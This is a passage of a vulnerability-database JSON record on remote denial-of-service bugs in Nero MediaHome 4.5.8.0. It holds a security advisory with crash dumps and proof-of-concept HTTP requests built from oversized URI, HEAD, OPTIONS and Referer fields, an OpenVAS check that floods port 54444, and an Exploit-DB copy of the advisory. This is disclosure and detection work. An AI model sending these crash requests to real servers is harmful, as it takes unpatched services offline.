AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) \nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap) \nECX: 41414141 (1094795585) -> N/A \nEDX: 41414141 (1094795585) -> N/A \nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap) \nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap) \nEBP: 0527f828 ( 86505512) -> `' (stack) \nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack) \n+00: 003e0000 ( 4063232) -> Tp@>+ (heap) \n+04: 00000021 ( 33) -> N/A \n+08: 003e0004 ( 4063236) -> Tp@>+ (heap) \n+0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack) \n+10: 7c928ccd (2089979085) -> N/A \n+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap) \n \n \nDisasm around: \n \n0x7c9209f8 jnz 0x7c95af5f \n0x7c9209fe mov al,[esi+0x5] \n0x7c920a01 and al,0x10 \n0x7c920a03 test al,0x10 \n0x7c920a05 mov [edi+0x5],al \n0x7c920a08 jnz 0x7c920aa0 \n0x7c920a0e mov ecx,[esi+0xc] \n0x7c920a11 lea eax,[esi+0x8] \n0x7c920a14 mov edx,[eax] \n0x7c920a16 mov [ebp+0xc],ecx \n0x7c920a19 mov ecx,[ecx] \n0x7c920a1b cmp ecx,[edx+0x4] \n0x7c920a1e mov [ebp+0x14],edx \n0x7c920a21 jnz 0x7c921752 \n0x7c920a27 cmp ecx,eax \n0x7c920a29 jnz 0x7c921752 \n0x7c920a2f push esi \n0x7c920a30 push ebx \n0x7c920a31 call 0x7c920684 \n0x7c920a36 mov eax,[ebp+0x14] \n0x7c920a39 mov ecx,[ebp+0xc] \n \n \nProof of Concept: \nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely: \n \nGET / HTTP/1.1 \nHost: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer:[A * 265566] \n \n \n \n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877 \n \n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request. \n \nCrash details: \n \nEIP: 10003171 mov [eax+0x18],ebp \nEAX: 00000000 ( 0) -> N/A \nEBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) \nECX: 039cddea ( 60612074) -> localhost (heap) \nEDX: 039cddea ( 60612074) -> localhost (heap) \nEDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap) \nESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap) \nEBP: 00000009 ( 9) -> N/A \nESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack) \n+00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap) \n+04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap) \n+08: 00000000 ( 0) -> N/A \n+0c: 00000001 ( 1) -> N/A \n+10: 000000b8 ( 184) -> N/A \n+14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap) \n \n \nDisasm around: \n \n0x10003156 mov edx,[esi+0x8] \n0x10003159 mov ebp,[esi+0xc] \n0x1000315c push byte 0x1 \n0x1000315e push eax \n0x1000315f push ecx \n0x10003160 push ebx \n0x10003161 mov [edi+0x40],esi \n0x10003164 mov [esp+0x2c],edx \n0x10003168 call 0x10002730 \n0x1000316d mov ecx,[esp+0x2c] \n0x10003171 mov [eax+0x18],ebp \n0x10003174 mov ebp,[esp+0x24] \n0x10003178 add esp,0x10 \n0x1000317b mov [eax+0x14],ecx \n0x1000317e mov edx,[ebp+0x8] \n0x10003181 test edx,edx \n0x10003183 mov [esp+0x14],edx \n0x10003187 jnz 0x10002ff0 \n0x1000318d mov eax,[esp+0x24] \n0x10003191 push eax \n0x10003192 call 0x10002c20 \n \n \nProof of Concept: \nThe following HTTP request will crash Nero MediaHome server remotely: \n \nGET / HTTP/1.1 \n: somehost.com \nUser-Agent: Mozilla/5.0 (Windows; U) \nAccept-Language: en-us,en;q=0.5 \nKeep-Alive: 300 \nConnection: keep-alive \nReferer: http://www.host.com \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nVendor last response (January 9, 2013): \n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\" \n \nAs a temporary solution it is advised to remove the vulnerable application from your system. \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities. \n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/119424/neromediahome-dos.txt"}], "openvas": [{"lastseen": "2020-07-21T21:59:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-5876", "CVE-2012-5877"], "description": "Nero MediaHome Server is prone to multiple denial of service\n vulnerabilities.", "modified": "2020-07-16T00:00:00", "published": "2013-01-10T00:00:00", "id": "OPENVAS:1361412562310803150", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803150", "type": "openvas", "title": "Nero MediaHome Server Multiple Remote DoS Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Nero MediaHome Server Multiple Remote DoS Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803150\");\n script_version(\"2020-07-16T08:52:35+0000\");\n script_cve_id(\"CVE-2012-5876\", \"CVE-2012-5877\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 08:52:35 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-01-10 14:19:03 +0530 (Thu, 10 Jan 2013)\");\n script_name(\"Nero MediaHome Server Multiple Remote DoS Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"Nero MediaHome Server is prone to multiple denial of service\n vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"This test works by sending a big size request to the target\n service listening on port 54444/TCP and checking that the target service is dead.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since\n the disclosure of this vulnerability. Likely none will be provided anymore. General solution options\n are to upgrade to a newer release, disable respective features, remove the product or replace the\n product by another one.\");\n\n script_tag(name:\"affected\", value:\"Nero MediaHome Server version 4.5.8.100 and prior.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to improper handling of the URI length,\n HTTP OPTIONS method length, HTTP HEAD request, HTTP REFERER and HTTP HOST header\n within the 'NMMediaServer.dll' in dynamic-link library which allows attackers to\n cause denial of service condition by sending a specially crafted packet\n to port 54444/TCP.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause the\n application to crash, creating a denial-of-service condition.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://inter5.org/archives/226548\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Jan/36\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.com/advisory/HTB23130\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/525249/30/0/threaded\");\n\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_require_ports(\"Services/www\", 54444);\n script_mandatory_keys(\"Nero-MediaHome/banner\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:54444);\n\nbanner = http_get_remote_headers(port:port);\nif(!banner || \"Nero-MediaHome/\" >!< banner)\n exit(0);\n\nif(http_is_dead(port:port))\n exit(0);\n\nreq = http_get(item:string(\"/A\", crap(500000)), port:port);\n\nfor(i = 0; i < 5; i++)\n http_send_recv(port:port, data:req);\n\nsleep(2);\n\nif(http_is_dead(port:port)) {\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2022-06-02T22:09:58", "description": "", "cvss3": {}, "published": "2013-01-10T00:00:00", "type": "exploitdb", "title": "Nero MediaHome 4.5.8.0 - Denial of Service", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2012-5876", "2012-5877", "CVE-2012-5876", "CVE-2012-5877"], "modified": "2013-01-10T00:00:00", "id": "EDB-ID:24022", "href": "https://www.exploit-db.com/exploits/24022", "sourceData": "Advisory ID: HTB23130\r\nProduct: Nero MediaHome\r\nVendor: Nero\r\nVulnerable Version(s): 4.5.8.0 and probably prior\r\nTested Version: 4.5.8.0 in Windows 7 SP1\r\nVendor Notification: November 21, 2012 \r\nPublic Disclosure: January 9, 2013 \r\nVulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]\r\nCVE References: CVE-2012-5876, CVE-2012-5877\r\nCVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)\r\nRisk Level: Low \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.\r\n\r\n\r\n1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876\r\n\r\n1.1 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b2a808 ( 62040072) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> b@>@>\" (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b2b000 ( 62042112) -> D (heap)\r\nESI: 03b2a800 ( 62040064) -> (heap)\r\nEBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. (stack)\r\nESP: 0526f848 ( 86440008) -> >\">&|&B>>D&$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>. (stack)\r\n+00: 003e0000 ( 4063232) -> b@>@>\" (heap)\r\n+04: 00000022 ( 34) -> N/A\r\n+08: 003e0004 ( 4063236) -> b@>@>\" (heap)\r\n+0c: 0526f88c ( 86440076) -> &$|>|&>\"|>>\"&& |(|\"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET /[A * 500000] HTTP/1.1\r\nHOST: somehost.com\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.2 The vulnerability exists due to improper handling of the URI length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c921689 mov ecx,[ecx]\r\nEAX: 03b63008 ( 62271496) -> (heap)\r\nEBX: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\nECX: 00000000 ( 0) -> N/A\r\nEDX: 00000000 ( 0) -> N/A\r\nEDI: 03b64000 ( 62275584) -> B (heap)\r\nESI: 03b63000 ( 62271488) -> (heap)\r\nEBP: 0527f864 ( 86505572) -> '|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]| (stack)\r\nESP: 0527f858 ( 86505560) -> >!>'|@'A>|B'$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' | (stack)\r\n+00: 003e0000 ( 4063232) -> # 8@>+ (heap)\r\n+04: 00000021 ( 33) -> N/A\r\n+08: 003e0004 ( 4063236) -> # 8@>+ (heap)\r\n+0c: 0527f89c ( 86505628) -> '$|>>\"|>>('' |(|\"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)\r\n+10: 7c928ccd (2089979085) -> N/A\r\n+14: 00000000 ( 0) -> N/A\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c921664 mov ecx,[ebp+0x10]\r\n 0x7c921667 add eax,[ecx]\r\n 0x7c921669 cmp eax,0xfe00\r\n 0x7c92166e ja 0x7c920721\r\n 0x7c921674 cmp byte [ebp+0x14],0x0\r\n 0x7c921678 jnz 0x7c95ae10\r\n 0x7c92167e mov ecx,[esi+0xc]\r\n 0x7c921681 lea eax,[esi+0x8]\r\n 0x7c921684 mov edx,[eax]\r\n 0x7c921686 mov [ebp+0x8],ecx\r\n 0x7c921689 mov ecx,[ecx]\r\n 0x7c92168b cmp ecx,[edx+0x4]\r\n 0x7c92168e mov [ebp+0xc],edx\r\n 0x7c921691 jnz 0x7c921734\r\n 0x7c921697 cmp ecx,eax\r\n 0x7c921699 jnz 0x7c921734\r\n 0x7c92169f push esi\r\n 0x7c9216a0 push ebx\r\n 0x7c9216a1 call 0x7c920684\r\n 0x7c9216a6 mov eax,[ebp+0xc]\r\n 0x7c9216a9 mov ecx,[ebp+0x8]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nHEAD / [A * 265696] HTTP/1.1\r\nACCEPT: */*\r\nAccept-Encoding: None\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\nConnection: Close\r\nAccept-Transfer-Encoding: None\r\n\r\n\r\n\r\n1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.\r\n\r\nCrash details:\r\n\r\nEIP: 7c920a1b cmp ecx,[edx+0x4]\r\nEAX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBX: 003e0000 ( 4063232) -> @>+ (heap)\r\nECX: 03c1bb90 ( 63028112) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEDX: 03b50101 ( 62193921) -> N/A\r\nEDI: 03c1bb30 ( 63028016) -> yDPyDh8yDh >>#H\"G^^^^o^I@_l (heap)\r\nESI: 03c1bb88 ( 63028104) -> >>#H\"G^^^^o^I@_lhf19fPf36dLaExe (heap)\r\nEBP: 033bfc78 ( 54262904) -> L;L (stack)\r\nESP: 033bfc6c ( 54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)\r\n+00: 003e0000 ( 4063232) -> @>+ (heap)\r\n+04: 03c1bb78 ( 63028088) -> >>#H\"G^^^^o^I@_lhf19fPf36dLa (heap)\r\n+08: 00000000 ( 0) -> N/A\r\n+0c: 033bfd4c ( 54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)\r\n+10: 7c92084c (2089945164) -> N/A\r\n+14: 03adb908 ( 61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n 0x7c920a3c cmp eax,ecx\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nOPTIONS / [A * 265712]\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nReferer: http://www.host.com\r\n\r\n\r\n\r\n1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. \r\n\r\nCrash details:\r\n\r\nEIP: 7c920a19 mov ecx,[ecx]\r\nEAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBX: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\nECX: 41414141 (1094795585) -> N/A\r\nEDX: 41414141 (1094795585) -> N/A\r\nEDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)\r\nESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)\r\nEBP: 0527f828 ( 86505512) -> `' (stack)\r\nESP: 0527f81c ( 86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' | (stack)\r\n +00: 003e0000 ( 4063232) -> Tp@>+ (heap)\r\n +04: 00000021 ( 33) -> N/A\r\n +08: 003e0004 ( 4063236) -> Tp@>+ (heap)\r\n +0c: 0527f860 ( 86505568) -> '$|>pgg|' |(|\"|||>\"|>><'' |(|\"||x>'><' |>@'X`4' |`| (stack)\r\n +10: 7c928ccd (2089979085) -> N/A\r\n +14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x7c9209f8 jnz 0x7c95af5f\r\n 0x7c9209fe mov al,[esi+0x5]\r\n 0x7c920a01 and al,0x10\r\n 0x7c920a03 test al,0x10\r\n 0x7c920a05 mov [edi+0x5],al\r\n 0x7c920a08 jnz 0x7c920aa0\r\n 0x7c920a0e mov ecx,[esi+0xc]\r\n 0x7c920a11 lea eax,[esi+0x8]\r\n 0x7c920a14 mov edx,[eax]\r\n 0x7c920a16 mov [ebp+0xc],ecx\r\n 0x7c920a19 mov ecx,[ecx]\r\n 0x7c920a1b cmp ecx,[edx+0x4]\r\n 0x7c920a1e mov [ebp+0x14],edx\r\n 0x7c920a21 jnz 0x7c921752\r\n 0x7c920a27 cmp ecx,eax\r\n 0x7c920a29 jnz 0x7c921752\r\n 0x7c920a2f push esi\r\n 0x7c920a30 push ebx\r\n 0x7c920a31 call 0x7c920684\r\n 0x7c920a36 mov eax,[ebp+0x14]\r\n 0x7c920a39 mov ecx,[ebp+0xc]\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash the vulnerable Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\nHost: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer:[A * 265566]\r\n\r\n\r\n\r\n2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877\r\n\r\n2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the \"NMMediaServer.dll\" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.\r\n\r\nCrash details:\r\n\r\nEIP: 10003171 mov [eax+0x18],ebp\r\n EAX: 00000000 ( 0) -> N/A\r\n EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n ECX: 039cddea ( 60612074) -> localhost (heap)\r\n EDX: 039cddea ( 60612074) -> localhost (heap)\r\n EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)\r\n ESI: 037c7fb0 ( 58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)\r\n EBP: 00000009 ( 9) -> N/A\r\n ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)\r\n +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)\r\n +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)\r\n +08: 00000000 ( 0) -> N/A\r\n +0c: 00000001 ( 1) -> N/A\r\n +10: 000000b8 ( 184) -> N/A\r\n +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)\r\n\r\n\r\nDisasm around:\r\n\r\n 0x10003156 mov edx,[esi+0x8]\r\n 0x10003159 mov ebp,[esi+0xc]\r\n 0x1000315c push byte 0x1\r\n 0x1000315e push eax\r\n 0x1000315f push ecx\r\n 0x10003160 push ebx\r\n 0x10003161 mov [edi+0x40],esi\r\n 0x10003164 mov [esp+0x2c],edx\r\n 0x10003168 call 0x10002730\r\n 0x1000316d mov ecx,[esp+0x2c]\r\n 0x10003171 mov [eax+0x18],ebp\r\n 0x10003174 mov ebp,[esp+0x24]\r\n 0x10003178 add esp,0x10\r\n 0x1000317b mov [eax+0x14],ecx\r\n 0x1000317e mov edx,[ebp+0x8]\r\n 0x10003181 test edx,edx\r\n 0x10003183 mov [esp+0x14],edx\r\n 0x10003187 jnz 0x10002ff0\r\n 0x1000318d mov eax,[esp+0x24]\r\n 0x10003191 push eax\r\n 0x10003192 call 0x10002c20\r\n\r\n\r\nProof of Concept:\r\nThe following HTTP request will crash Nero MediaHome server remotely:\r\n\r\nGET / HTTP/1.1\r\n: somehost.com\r\nUser-Agent: Mozilla/5.0 (Windows; U)\r\nAccept-Language: en-us,en;q=0.5\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nReferer: http://www.host.com\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nVendor last response (January 9, 2013):\r\n\"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon.\"\r\n\r\nAs a temporary solution it is advised to remove the vulnerable application from your system.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23130 - https://www.htbridge.com/advisory/HTB23130 - Nero MediaHome Server Multiple Remote DoS vulnerabilities.\r\n[2] Nero - http://www.nero.com - Nero MediaHome server easily distributes music, videos and photos over your network.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "sourceHref": 